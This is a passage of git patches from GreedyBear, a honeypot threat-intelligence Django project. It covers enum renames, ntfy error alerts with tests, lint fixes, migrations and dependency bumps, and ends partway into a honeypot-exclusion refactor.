@@ -120,8 +120,8 @@ class Statistics(models.Model):
view = models.CharField(
max_length=32,
blank=False,
- choices=viewType.choices,
- default=viewType.FEEDS_VIEW.value,
+ choices=ViewType.choices,
+ default=ViewType.FEEDS_VIEW.value,
)
request_date = models.DateTimeField(blank=False, default=datetime.now)
diff --git a/tests/__init__.py b/tests/__init__.py
index 5226f137..0bf0a52f 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -10,7 +10,7 @@
CommandSequence,
CowrieSession,
GeneralHoneypot,
- iocType,
+ IocType,
)
@@ -26,7 +26,7 @@ def setUpTestData(cls):
cls.current_time = datetime.now()
cls.ioc = IOC.objects.create(
name="140.246.171.141",
- type=iocType.IP.value,
+ type=IocType.IP.value,
first_seen=cls.current_time,
last_seen=cls.current_time,
days_seen=[cls.current_time],
@@ -48,7 +48,7 @@ def setUpTestData(cls):
cls.ioc_2 = IOC.objects.create(
name="99.99.99.99",
- type=iocType.IP.value,
+ type=IocType.IP.value,
first_seen=cls.current_time,
last_seen=cls.current_time,
days_seen=[cls.current_time],
@@ -70,7 +70,7 @@ def setUpTestData(cls):
cls.ioc_3 = IOC.objects.create(
name="100.100.100.100",
- type=iocType.IP.value,
+ type=IocType.IP.value,
first_seen=cls.current_time,
last_seen=cls.current_time,
days_seen=[cls.current_time],
@@ -92,7 +92,7 @@ def setUpTestData(cls):
cls.ioc_domain = IOC.objects.create(
name="malicious.example.com",
- type=iocType.DOMAIN.value,
+ type=IocType.DOMAIN.value,
first_seen=cls.current_time,
last_seen=cls.current_time,
days_seen=[cls.current_time],
diff --git a/tests/test_ioc_processor.py b/tests/test_ioc_processor.py
index b033e592..5b68153e 100644
--- a/tests/test_ioc_processor.py
+++ b/tests/test_ioc_processor.py
@@ -3,7 +3,7 @@
from greedybear.consts import PAYLOAD_REQUEST, SCANNER
from greedybear.cronjobs.extraction.ioc_processor import IocProcessor
-from greedybear.models import iocType
+from greedybear.models import IocType
from . import ExtractionTestCase
@@ -26,7 +26,7 @@ def test_filters_sensor_ips(self):
def test_filters_whatsmyip_domains(self, mock_whatsmyip):
mock_whatsmyip.return_value = True
self.mock_sensor_repo.sensors = set()
- ioc = self._create_mock_ioc(name="some.domain.com", ioc_type=iocType.DOMAIN)
+ ioc = self._create_mock_ioc(name="some.domain.com", ioc_type=IocType.DOMAIN)
result = self.processor.add_ioc(ioc, attack_type=SCANNER)
@@ -168,7 +168,7 @@ def test_full_update_flow(self):
def test_only_checks_whatsmyip_for_domains(self, mock_whatsmyip):
self.mock_sensor_repo.sensors = set()
self.mock_ioc_repo.get_ioc_by_name.return_value = None
- ioc = self._create_mock_ioc(name="1.2.3.4", ioc_type=iocType.IP)
+ ioc = self._create_mock_ioc(name="1.2.3.4", ioc_type=IocType.IP)
self.mock_ioc_repo.save.return_value = ioc
result = self.processor.add_ioc(ioc, attack_type=SCANNER)
diff --git a/tests/test_models.py b/tests/test_models.py
index ae497437..67cabb9b 100644
--- a/tests/test_models.py
+++ b/tests/test_models.py
@@ -1,4 +1,4 @@
-from greedybear.models import Statistics, iocType, viewType
+from greedybear.models import IocType, Statistics, ViewType
from . import CustomTestCase
@@ -6,7 +6,7 @@
class ModelsTestCase(CustomTestCase):
def test_ioc_model(self):
self.assertEqual(self.ioc.name, "140.246.171.141")
- self.assertEqual(self.ioc.type, iocType.IP.value)
+ self.assertEqual(self.ioc.type, IocType.IP.value)
self.assertEqual(self.ioc.first_seen, self.current_time)
self.assertEqual(self.ioc.last_seen, self.current_time)
self.assertEqual(self.ioc.days_seen, [self.current_time])
@@ -51,11 +51,11 @@ def test_cowrie_session_model(self):
def test_statistics_model(self):
self.statistic = Statistics.objects.create(
source="140.246.171.141",
- view=viewType.ENRICHMENT_VIEW.value,
+ view=ViewType.ENRICHMENT_VIEW.value,
request_date=self.current_time,
)
self.assertEqual(self.statistic.source, "140.246.171.141")
- self.assertEqual(self.statistic.view, viewType.ENRICHMENT_VIEW.value)
+ self.assertEqual(self.statistic.view, ViewType.ENRICHMENT_VIEW.value)
self.assertEqual(self.statistic.request_date, self.current_time)
def test_general_honeypot_model(self):
diff --git a/tests/test_rf_models.py b/tests/test_rf_models.py
index ea6d4b69..102517f8 100644
--- a/tests/test_rf_models.py
+++ b/tests/test_rf_models.py
@@ -90,11 +90,11 @@ def test_rf_regressor(self):
for a, b in zip(training_target, REGRESSOR_TARGET, strict=False):
self.assertEqual(a, b)
- X_train, X_test, y_train, y_test = regressor.split_train_test(SAMPLE_DATA, training_target)
- self.assertEqual(len(X_train), 4)
- self.assertEqual(len(X_test), 1)
- self.assertEqual(len(X_train), len(y_train))
- self.assertEqual(len(X_test), len(y_test))
+ x_train, x_test, y_train, y_test = regressor.split_train_test(SAMPLE_DATA, training_target)
+ self.assertEqual(len(x_train), 4)
+ self.assertEqual(len(x_test), 1)
+ self.assertEqual(len(x_train), len(y_train))
+ self.assertEqual(len(x_test), len(y_test))
df = regressor.score(SAMPLE_DATA)
for a, b in zip(df["mock_score"], regressor.model.predict.return_value, strict=False):
diff --git a/tests/test_views.py b/tests/test_views.py
index 03acf9b2..f8cef307 100644
--- a/tests/test_views.py
+++ b/tests/test_views.py
@@ -3,7 +3,7 @@
from rest_framework.test import APIClient
from api.views.utils import is_ip_address, is_sha256hash
-from greedybear.models import GeneralHoneypot, Statistics, viewType
+from greedybear.models import GeneralHoneypot, Statistics, ViewType
from . import CustomTestCase
@@ -270,8 +270,8 @@ class StatisticsViewTestCase(CustomTestCase):
def setUpClass(cls):
super().setUpClass()
Statistics.objects.all().delete()
- Statistics.objects.create(source="140.246.171.141", view=viewType.FEEDS_VIEW.value)
- Statistics.objects.create(source="140.246.171.141", view=viewType.ENRICHMENT_VIEW.value)
+ Statistics.objects.create(source="140.246.171.141", view=ViewType.FEEDS_VIEW.value)
+ Statistics.objects.create(source="140.246.171.141", view=ViewType.ENRICHMENT_VIEW.value)
@classmethod
def tearDownClass(cls):
From 25b9706bd24c1d7e98233026d59a9b9141acc5c9 Mon Sep 17 00:00:00 2001
From: Varandani Harsh Pramod
<76023663+HARSHVARANDANI@users.noreply.github.com>
Date: Mon, 5 Jan 2026 00:55:00 +0530
Subject: [PATCH 27/75] feat: ntfy alerts for monitor logs. Closes #664 (#667)
* feat: ntfy alerts for monitor logs. Closes #664
* refactor: changed function name to send_slack_message to improve code readability
* added formatting for ntfy alerts
* added a test for ntfy alerts feature
* removed redundant dependency
* added comments in env template
* formatting changes
* fix formatting
---------
Co-authored-by: Matteo Lodi <30625432+mlodic@users.noreply.github.com>
Co-authored-by: tim
---
docker/env_file_template | 4 ++
greedybear/cronjobs/monitor_logs.py | 9 ++-
greedybear/ntfy.py | 31 +++++++++++
greedybear/settings.py | 1 +
greedybear/slack.py | 2 +-
tests/test_ntfy.py | 86 +++++++++++++++++++++++++++++
6 files changed, 129 insertions(+), 4 deletions(-)
create mode 100644 greedybear/ntfy.py
create mode 100644 tests/test_ntfy.py
diff --git a/docker/env_file_template b/docker/env_file_template
index 2da34e56..890f102d 100644
--- a/docker/env_file_template
+++ b/docker/env_file_template
@@ -35,6 +35,10 @@ ELASTIC_ENDPOINT=
SLACK_TOKEN=
DEFAULT_SLACK_CHANNEL=
+NTFY_URL=
+# Url of the ntfy topic to recieve error alerts
+# Example: https://ntfy.sh/your_topic
+
STAGE="production"
DEBUG=False
MOCK_CONNECTIONS=False
diff --git a/greedybear/cronjobs/monitor_logs.py b/greedybear/cronjobs/monitor_logs.py
index b6de87bb..efe7137c 100644
--- a/greedybear/cronjobs/monitor_logs.py
+++ b/greedybear/cronjobs/monitor_logs.py
@@ -4,7 +4,8 @@
from pathlib import Path
from greedybear.cronjobs.base import Cronjob
-from greedybear.slack import send_message
+from greedybear.ntfy import send_ntfy_message
+from greedybear.slack import send_slack_message
class MonitorLogs(Cronjob):
@@ -27,7 +28,7 @@ def __init__(
self.logs_to_monitor = ["greedybear", "api", "django", "celery"]
def run(self):
- """Check error logs for recent modifications and alert via Slack."""
+ """Check error logs for recent modifications and alert via Slack and ntfy."""
cutoff_time = datetime.now() - timedelta(minutes=self.check_window_minutes)
self.log.info(f"checking {len(self.logs_to_monitor)} error logs for activity since {cutoff_time}")
@@ -46,6 +47,8 @@ def run(self):
if last_modified > cutoff_time:
message = f"found errors in log file {log_file}"
self.log.warning(message)
- send_message(message)
+ send_slack_message(message)
+ message = f"**⚠️ GreedyBear Error**\n\nErrors detected in `{log_file}`"
+ send_ntfy_message(message)
else:
self.log.debug(f"no recent activity in {log_file}")
diff --git a/greedybear/ntfy.py b/greedybear/ntfy.py
new file mode 100644
index 00000000..e361788d
--- /dev/null
+++ b/greedybear/ntfy.py
@@ -0,0 +1,31 @@
+import logging
+
+import requests
+from django.conf import settings
+
+logger = logging.getLogger(__name__)
+
+
+def send_ntfy_message(message):
+ if not settings.NTFY_URL:
+ logger.warning("ntfy is not configured, message not sent")
+ return
+
+ headers = {
+ "Title": "GreedyBear Error",
+ "Priority": "4",
+ "Tags": "warning",
+ "Markdown": "yes",
+ }
+
+ try:
+ response = requests.post(
+ settings.NTFY_URL,
+ data=message.encode("utf-8"),
+ headers=headers,
+ timeout=(1, 2),
+ )
+ response.raise_for_status()
+
+ except Exception as error:
+ logger.exception(error)
diff --git a/greedybear/settings.py b/greedybear/settings.py
index 565a1172..f9c592b8 100644
--- a/greedybear/settings.py
+++ b/greedybear/settings.py
@@ -51,6 +51,7 @@
SLACK_TOKEN = os.environ.get("SLACK_TOKEN", "")
DEFAULT_SLACK_CHANNEL = os.environ.get("DEFAULT_SLACK_CHANNEL", "")
+NTFY_URL = os.environ.get("NTFY_URL", "")
VERSION = os.environ.get("REACT_APP_GREEDYBEAR_VERSION", "")
diff --git a/greedybear/slack.py b/greedybear/slack.py
index b820e1d8..1fef9687 100644
--- a/greedybear/slack.py
+++ b/greedybear/slack.py
@@ -8,7 +8,7 @@
logger = logging.getLogger(__name__)
-def send_message(text):
+def send_slack_message(text):
if not settings.SLACK_TOKEN:
logger.warning("Slack is not configured, message not sent")
return
diff --git a/tests/test_ntfy.py b/tests/test_ntfy.py
new file mode 100644
index 00000000..de4c7c9c
--- /dev/null
+++ b/tests/test_ntfy.py
@@ -0,0 +1,86 @@
+from unittest.mock import MagicMock, patch
+
+from django.test import SimpleTestCase, override_settings
+
+from greedybear.ntfy import send_ntfy_message
+
+TEST_LOGGING = {
+ "version": 1,
+ "disable_existing_loggers": True,
+}
+
+
+@override_settings(LOGGING=TEST_LOGGING)
+class SendNtfyMessageTests(SimpleTestCase):
+ @override_settings(NTFY_URL="https://ntfy.sh/greedybear")
+ @patch("greedybear.ntfy.requests.post")
+ @patch("greedybear.ntfy.logger")
+ def test_happy_path_successful_post(self, mock_logger, mock_post):
+ message = "Something went wrong"
+
+ mock_response = MagicMock()
+ mock_response.raise_for_status.return_value = None
+ mock_post.return_value = mock_response
+
+ send_ntfy_message(message)
+
+ mock_post.assert_called_once_with(
+ "https://ntfy.sh/greedybear",
+ data=message.encode("utf-8"),
+ headers={
+ "Title": "GreedyBear Error",
+ "Priority": "4",
+ "Tags": "warning",
+ "Markdown": "yes",
+ },
+ timeout=(1, 2),
+ )
+ mock_logger.exception.assert_not_called()
+
+ @override_settings(NTFY_URL="https://ntfy.sh/greedybear")
+ @patch("greedybear.ntfy.requests.post")
+ def test_happy_path_non_ascii_message(self, mock_post):
+ message = "⚠️ Über-alert"
+
+ mock_response = MagicMock()
+ mock_response.raise_for_status.return_value = None
+ mock_post.return_value = mock_response
+
+ send_ntfy_message(message)
+
+ _, kwargs = mock_post.call_args
+ self.assertEqual(kwargs["data"], message.encode("utf-8"))
+
+ @override_settings(NTFY_URL="")
+ @patch("greedybear.ntfy.requests.post")
+ @patch("greedybear.ntfy.logger")
+ def test_no_url_configured_logs_warning_and_skips_post(self, mock_logger, mock_post):
+ send_ntfy_message("anything")
+
+ mock_post.assert_not_called()
+ mock_logger.warning.assert_called_once_with("ntfy is not configured, message not sent")
+
+ @override_settings(NTFY_URL="https://ntfy.sh/greedybear")
+ @patch("greedybear.ntfy.requests.post")
+ @patch("greedybear.ntfy.logger")
+ def test_http_error_logged_but_not_raised(self, mock_logger, mock_post):
+ error = Exception("HTTP 500")
+
+ mock_response = MagicMock()
+ mock_response.raise_for_status.side_effect = error
+ mock_post.return_value = mock_response
+
+ send_ntfy_message("msg")
+
+ mock_logger.exception.assert_called_once_with(error)
+
+ @override_settings(NTFY_URL="https://ntfy.sh/greedybear")
+ @patch("greedybear.ntfy.requests.post")
+ @patch("greedybear.ntfy.logger")
+ def test_network_error_logged_but_not_raised(self, mock_logger, mock_post):
+ error = TimeoutError("timeout")
+ mock_post.side_effect = error
+
+ send_ntfy_message("msg")
+
+ mock_logger.exception.assert_called_once_with(error)
From e79c0306628855fa8b4502659169a84c067eaf28 Mon Sep 17 00:00:00 2001
From: tim
Date: Sun, 4 Jan 2026 22:40:56 +0100
Subject: [PATCH 28/75] Bump celery from 5.6.1 to 5.6.2 in /requirements.
Closes #680
---
requirements/project-requirements.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index 3b05f326..20dc8eca 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -1,4 +1,4 @@
-celery==5.6.1
+celery==5.6.2
# if you change this, update the documentation
elasticsearch8==8.19.3
From a7394ffb1d5bef15a33c1fcd9107e22057ee2a70 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Tue, 6 Jan 2026 01:03:17 +0530
Subject: [PATCH 29/75] refactor: fix flake8-bugbear violations
(B006/B008/B017/B023/B904). Closes #677 (#679)
* refactor: fix mutable default arguments (B006/B008)
- Replace empty list defaults with None in _create_mock_ioc()
- Replace datetime.now() call in default argument with None
- Initialize mutable defaults inside function to avoid shared state
- Fixes flake8-bugbear violations B006 and B008
Phase 1 of bugbear violations fix. All tests passing (282/282).
* refactor: fix exception handling (B017/B904)
- Add 'from None' to LoginSerializer to suppress exception context
when re-raising ValidationError (intentionally hiding user existence)
- Add 'from e' to CowrieSessionRepository to preserve exception chain
when raising descriptive ValueError
- Replace bare Exception with IntegrityError in test for database
constraint violations
Phase 2 of bugbear violations fix. All tests passing (282/282).
* refactor: fix lambda loop variable binding (B023)
- Add default argument to lambda in multi_label_encode to capture
loop variable correctly
- Prevents late binding issue where all lambdas would reference the
final loop value instead of capturing each iteration's value
Phase 3 of bugbear violations fix. All tests passing (282/282).
* refactor: enable bugbear rules in ruff config
- Remove B006, B008, B017, B023, and B904 from ignore list
- All bugbear violations have been fixed in previous commits
- Enforces proper exception handling, mutable defaults, and lambda patterns
Phase 4 (final) of bugbear violations fix. All tests passing (282/282).
All ruff checks passing.
* refactor: use ternary operators for cleaner code
Use ternary operators directly in mock assignments instead of
separate if-else blocks for a more concise and Pythonic approach.
Co-authored-by: regulartim
---
.github/configurations/python_linters/.ruff.toml | 9 ---------
authentication/serializers.py | 6 +++---
.../cronjobs/repositories/cowrie_session.py | 4 ++--
greedybear/cronjobs/scoring/utils.py | 2 +-
tests/__init__.py | 16 ++++++++--------
tests/test_repositories.py | 4 +++-
6 files changed, 17 insertions(+), 24 deletions(-)
diff --git a/.github/configurations/python_linters/.ruff.toml b/.github/configurations/python_linters/.ruff.toml
index d51a6a7a..c657491a 100644
--- a/.github/configurations/python_linters/.ruff.toml
+++ b/.github/configurations/python_linters/.ruff.toml
@@ -53,15 +53,6 @@ select = [
ignore = [
# F403: Allow wildcard imports in __init__.py files
"F403",
- # B006/B008: Allow mutable defaults and function calls in defaults for test helpers
- "B006",
- "B008",
- # B017: Allow blind exception in tests
- "B017",
- # B023: Allow loop variable in lambda (functional style)
- "B023",
- # B904: Allow raise without from (intentional re-raise)
- "B904",
# C401/C408: Allow dict() and generator patterns (style preference)
"C401",
"C408",
diff --git a/authentication/serializers.py b/authentication/serializers.py
index bece6cad..960a7bab 100644
--- a/authentication/serializers.py
+++ b/authentication/serializers.py
@@ -147,8 +147,8 @@ def validate(self, attrs):
user = User.objects.get(username=attrs["username"])
except User.DoesNotExist:
# we do not want to leak info
- # so just raise the original exception
- raise exc
+ # so just raise the original exception without context
+ raise exc from None
else:
# custom error messages
if not user.is_active:
@@ -160,4 +160,4 @@ def validate(self, attrs):
exc.detail = "Your account was declined."
logger.info(f"User {user} is not active. Error message: {exc.detail}")
# else
- raise exc
+ raise exc from None
diff --git a/greedybear/cronjobs/repositories/cowrie_session.py b/greedybear/cronjobs/repositories/cowrie_session.py
index 49eb5e87..f8003859 100644
--- a/greedybear/cronjobs/repositories/cowrie_session.py
+++ b/greedybear/cronjobs/repositories/cowrie_session.py
@@ -27,8 +27,8 @@ def get_or_create_session(self, session_id: str, source: IOC) -> CowrieSession:
"""
try:
pk = int(session_id, 16)
- except ValueError:
- raise ValueError(f"session_id must be a valid hex string, got: {session_id!r}")
+ except ValueError as e:
+ raise ValueError(f"session_id must be a valid hex string, got: {session_id!r}") from e
record, created = CowrieSession.objects.get_or_create(session_id=pk, defaults={"source": source})
self.log.debug(f"created new session {session_id}" if created else f"{session_id} already exists")
return record
diff --git a/greedybear/cronjobs/scoring/utils.py b/greedybear/cronjobs/scoring/utils.py
index 232df1ef..878554e2 100644
--- a/greedybear/cronjobs/scoring/utils.py
+++ b/greedybear/cronjobs/scoring/utils.py
@@ -123,7 +123,7 @@ def multi_label_encode(df: pd.DataFrame, column_name: str) -> pd.DataFrame:
for value_list in df[column_name]:
unique_values.update(value_list)
for value in sorted(unique_values):
- result_df[f"has_{value}"] = df[column_name].apply(lambda x: 1 if value in x else 0)
+ result_df[f"has_{value}"] = df[column_name].apply(lambda x, value=value: 1 if value in x else 0)
return result_df.drop(column_name, axis=1)
diff --git a/tests/__init__.py b/tests/__init__.py
index 0bf0a52f..6cb71ac9 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -198,11 +198,11 @@ def _create_mock_ioc(
ioc_type="ip",
attack_count=1,
interaction_count=1,
- related_urls=[],
- destination_ports=[],
+ related_urls=None,
+ destination_ports=None,
login_attempts=0,
- days_seen=[],
- last_seen=datetime.now(),
+ days_seen=None,
+ last_seen=None,
ip_reputation="",
asn=1234,
):
@@ -213,11 +213,11 @@ def _create_mock_ioc(
mock.payload_request = False
mock.attack_count = attack_count
mock.interaction_count = interaction_count
- mock.related_urls = related_urls
- mock.destination_ports = destination_ports
- mock.days_seen = days_seen
+ mock.related_urls = related_urls if related_urls is not None else []
+ mock.destination_ports = destination_ports if destination_ports is not None else []
+ mock.days_seen = days_seen if days_seen is not None else []
mock.login_attempts = login_attempts
- mock.last_seen = last_seen
+ mock.last_seen = last_seen if last_seen is not None else datetime.now()
mock.ip_reputation = ip_reputation
mock.asn = asn
mock.number_of_days_seen = len(mock.days_seen)
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index c30f655c..2aa7526d 100644
--- a/tests/test_repositories.py
+++ b/tests/test_repositories.py
@@ -1,6 +1,8 @@
from datetime import datetime
from unittest.mock import Mock, patch
+from django.db import IntegrityError
+
from greedybear.cronjobs.repositories import (
CowrieSessionRepository,
ElasticRepository,
@@ -288,7 +290,7 @@ def test_get_or_create_session_with_hex_session_id(self):
def test_command_sequence_unique_hash_constraint(self):
existing = self.command_sequence
- with self.assertRaises(Exception):
+ with self.assertRaises(IntegrityError):
CommandSequence.objects.create(
commands=["different", "commands"],
commands_hash=existing.commands_hash,
From 6194db4648e0a4c8e069901314738e06d2f21743 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Tue, 6 Jan 2026 16:31:02 +0530
Subject: [PATCH 30/75] refactor: fix flake8-django violations
(DJ001/DJ008/DJ012). Closes #681 (#684)
* refactor: add __str__ methods and fix field ordering (DJ008/DJ012)
- Add __str__ to UserProfile, Sensor, FireHolList, CowrieSession,
Statistics, MassScanner, and WhatsMyIPDomain models
- Move UserProfile fields before Meta class (DJ012)
- Improves admin interface usability and debugging
Phase 1 of Django violations fix. All tests passing (282/282).
* refactor: fix CharField null=True violations (DJ001)
- Replace null=True with blank=True, default='' on FireHolList.source
and MassScanner.reason fields
- Filter empty source strings in get_firehol_categories to prevent
empty values in firehol_categories list
- Create database migration to update schema
Phase 2 of Django violations fix. All tests passing (282/282).
* refactor: enable Django violations checks in ruff config
- Remove DJ001, DJ008, and DJ012 from ignore list
- All Django model violations have been fixed in previous commits
- Enforces Django best practices for CharField, __str__, and field ordering
Phase 3 (final) of Django violations fix. All tests passing (282/282).
All ruff checks passing.
---
.../configurations/python_linters/.ruff.toml | 6 -----
authentication/models.py | 14 ++++++-----
greedybear/cronjobs/extraction/utils.py | 6 +++--
.../0026_fix_charfield_null_true.py | 23 +++++++++++++++++++
greedybear/models.py | 22 ++++++++++++++++--
5 files changed, 55 insertions(+), 16 deletions(-)
create mode 100644 greedybear/migrations/0026_fix_charfield_null_true.py
diff --git a/.github/configurations/python_linters/.ruff.toml b/.github/configurations/python_linters/.ruff.toml
index c657491a..3b513404 100644
--- a/.github/configurations/python_linters/.ruff.toml
+++ b/.github/configurations/python_linters/.ruff.toml
@@ -56,12 +56,6 @@ ignore = [
# C401/C408: Allow dict() and generator patterns (style preference)
"C401",
"C408",
- # DJ001: Allow null=True on CharField (intentional for optional fields)
- "DJ001",
- # DJ008: Allow models without __str__ (legacy models, API-only)
- "DJ008",
- # DJ012: Allow existing Django model field ordering
- "DJ012",
# E501: Allow long lines in docstrings
"E501",
diff --git a/authentication/models.py b/authentication/models.py
index f9806f2a..ec6f6bf7 100644
--- a/authentication/models.py
+++ b/authentication/models.py
@@ -18,15 +18,10 @@ class DiscoverFromChoices(models.TextChoices):
# models
class UserProfile(models.Model):
- # meta
- class Meta:
- verbose_name_plural = "User Profiles"
-
- # contants
+ # constants
DiscoverFromChoices = DiscoverFromChoices
# fields
-
user = models.OneToOneField(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
@@ -40,3 +35,10 @@ class Meta:
choices=DiscoverFromChoices.choices,
default=DiscoverFromChoices.OTHER,
)
+
+ # meta
+ class Meta:
+ verbose_name_plural = "User Profiles"
+
+ def __str__(self):
+ return f"{self.user.username} - {self.company_name}"
diff --git a/greedybear/cronjobs/extraction/utils.py b/greedybear/cronjobs/extraction/utils.py
index 5ca11253..b176ec79 100644
--- a/greedybear/cronjobs/extraction/utils.py
+++ b/greedybear/cronjobs/extraction/utils.py
@@ -68,7 +68,8 @@ def get_firehol_categories(ip: str, extracted_ip) -> list[str]:
# First check for exact IP match (for .ipset files)
exact_matches = FireHolList.objects.filter(ip_address=ip).values_list("source", flat=True)
- firehol_categories.extend(exact_matches)
+ # Filter out empty strings (from default='')
+ firehol_categories.extend([source for source in exact_matches if source])
# Then check if IP is within any network ranges (for .netset files)
# Only query entries that contain '/' (CIDR notation)
@@ -76,7 +77,8 @@ def get_firehol_categories(ip: str, extracted_ip) -> list[str]:
for entry in network_entries:
try:
network_range = ip_network(entry.ip_address, strict=False)
- if extracted_ip in network_range and entry.source not in firehol_categories:
+ # Check entry.source is not empty and not already in list
+ if extracted_ip in network_range and entry.source and entry.source not in firehol_categories:
firehol_categories.append(entry.source)
except (ValueError, IndexError):
# Not a valid network range, skip
diff --git a/greedybear/migrations/0026_fix_charfield_null_true.py b/greedybear/migrations/0026_fix_charfield_null_true.py
new file mode 100644
index 00000000..96356db6
--- /dev/null
+++ b/greedybear/migrations/0026_fix_charfield_null_true.py
@@ -0,0 +1,23 @@
+# Generated by Django 5.2.9 on 2026-01-06 09:35
+
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+
+ dependencies = [
+ ('greedybear', '0025_merge_20251223_2100'),
+ ]
+
+ operations = [
+ migrations.AlterField(
+ model_name='firehollist',
+ name='source',
+ field=models.CharField(blank=True, default='', max_length=64),
+ ),
+ migrations.AlterField(
+ model_name='massscanner',
+ name='reason',
+ field=models.CharField(blank=True, default='', max_length=64),
+ ),
+ ]
diff --git a/greedybear/models.py b/greedybear/models.py
index 77c68e33..6221e58f 100644
--- a/greedybear/models.py
+++ b/greedybear/models.py
@@ -21,6 +21,9 @@ class IocType(models.TextChoices):
class Sensor(models.Model):
address = models.CharField(max_length=15, blank=False)
+ def __str__(self):
+ return self.address
+
class GeneralHoneypot(models.Model):
name = models.CharField(max_length=15, blank=False)
@@ -33,13 +36,16 @@ def __str__(self):
class FireHolList(models.Model):
ip_address = models.CharField(max_length=256, blank=False)
added = models.DateTimeField(blank=False, default=datetime.now)
- source = models.CharField(max_length=64, blank=True, null=True)
+ source = models.CharField(max_length=64, blank=True, default="")
class Meta:
indexes = [
models.Index(fields=["ip_address"]),
]
+ def __str__(self):
+ return f"{self.ip_address} ({self.source or 'unknown'})"
+
class IOC(models.Model):
name = models.CharField(max_length=256, blank=False)
@@ -114,6 +120,9 @@ class Meta:
models.Index(fields=["source"]),
]
+ def __str__(self):
+ return f"Session {hex(self.session_id)[2:]} from {self.source.name}"
+
class Statistics(models.Model):
source = models.CharField(max_length=15, blank=False)
@@ -125,17 +134,23 @@ class Statistics(models.Model):
)
request_date = models.DateTimeField(blank=False, default=datetime.now)
+ def __str__(self):
+ return f"{self.source} - {self.view} ({self.request_date.strftime('%Y-%m-%d %H:%M')})"
+
class MassScanner(models.Model):
ip_address = models.CharField(max_length=256, blank=False)
added = models.DateTimeField(blank=False, default=datetime.now)
- reason = models.CharField(max_length=64, blank=True, null=True)
+ reason = models.CharField(max_length=64, blank=True, default="")
class Meta:
indexes = [
models.Index(fields=["ip_address"]),
]
+ def __str__(self):
+ return f"{self.ip_address}{f' ({self.reason})' if self.reason else ''}"
+
class WhatsMyIPDomain(models.Model):
domain = models.CharField(max_length=256, blank=False)
@@ -145,3 +160,6 @@ class Meta:
indexes = [
models.Index(fields=["domain"]),
]
+
+ def __str__(self):
+ return self.domain
From 1eece9912fcaa002ec74a4f98a106e944c857d41 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 8 Jan 2026 08:26:25 +0100
Subject: [PATCH 31/75] Bump django-ses from 4.5.0 to 4.6.0 in /requirements
(#686)
Bumps [django-ses](https://github.com/django-ses/django-ses) from 4.5.0 to 4.6.0.
- [Release notes](https://github.com/django-ses/django-ses/releases)
- [Changelog](https://github.com/django-ses/django-ses/blob/main/CHANGES.md)
- [Commits](https://github.com/django-ses/django-ses/compare/v4.5.0...v4.6.0)
---
updated-dependencies:
- dependency-name: django-ses
dependency-version: 4.6.0
dependency-type: direct:production
update-type: version-update:semver-minor
...
Signed-off-by: dependabot[bot]
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
requirements/project-requirements.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index 20dc8eca..bdb889e0 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -6,7 +6,7 @@ elasticsearch8==8.19.3
Django==5.2.9
djangorestframework==3.16.1
django-rest-email-auth==5.0.0
-django-ses==4.5.0
+django-ses==4.6.0
psycopg2-binary==2.9.11
From 0b9623298fb43036bc2afe9e34e4016ed67cb511 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 8 Jan 2026 08:26:57 +0100
Subject: [PATCH 32/75] Bump django from 5.2.9 to 5.2.10 in /requirements
(#688)
Bumps [django](https://github.com/django/django) from 5.2.9 to 5.2.10.
- [Commits](https://github.com/django/django/compare/5.2.9...5.2.10)
---
updated-dependencies:
- dependency-name: django
dependency-version: 5.2.10
dependency-type: direct:production
update-type: version-update:semver-patch
...
Signed-off-by: dependabot[bot]
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
requirements/project-requirements.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index bdb889e0..bf6f63a3 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -3,7 +3,7 @@ celery==5.6.2
# if you change this, update the documentation
elasticsearch8==8.19.3
-Django==5.2.9
+Django==5.2.10
djangorestframework==3.16.1
django-rest-email-auth==5.0.0
django-ses==4.6.0
From fc5b5f1d5f0993611e479261e107d87e37b5be0e Mon Sep 17 00:00:00 2001
From: Drona Raj Gyawali
Date: Thu, 8 Jan 2026 15:54:48 +0545
Subject: [PATCH 33/75] refactor:honeypot extraction using DB-driven exclusion.
closes #631 (#670)
* refactor:honeypot extraction using DB-driven exclusion
* feat/refactor: added migration file and changes in extraction
* refactor: DB creation behavior is deferred
* fix(ioc): restore create_honeypot in is_ready_for_extraction and normalize cache keys
* test(repo): Add case-insensitive tests for honeypot extraction
* resolve: conflict
* add test for insesitive honeypot retrieval
* refactor(repo): implement insensitive lookup in get_hp_by_name
---------
Co-authored-by: tim
---
greedybear/cronjobs/repositories/ioc.py | 24 +++++++-----
.../0027_disable_unwanted_honeypots.py | 34 +++++++++++++++++
tests/test_repositories.py | 37 ++++++++++++++++---
3 files changed, 80 insertions(+), 15 deletions(-)
create mode 100644 greedybear/migrations/0027_disable_unwanted_honeypots.py
diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
index 0f40a9fb..f9ef046b 100644
--- a/greedybear/cronjobs/repositories/ioc.py
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -16,8 +16,12 @@ class IocRepository:
def __init__(self):
"""Initialize the repository and populate the honeypot cache from the database."""
self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
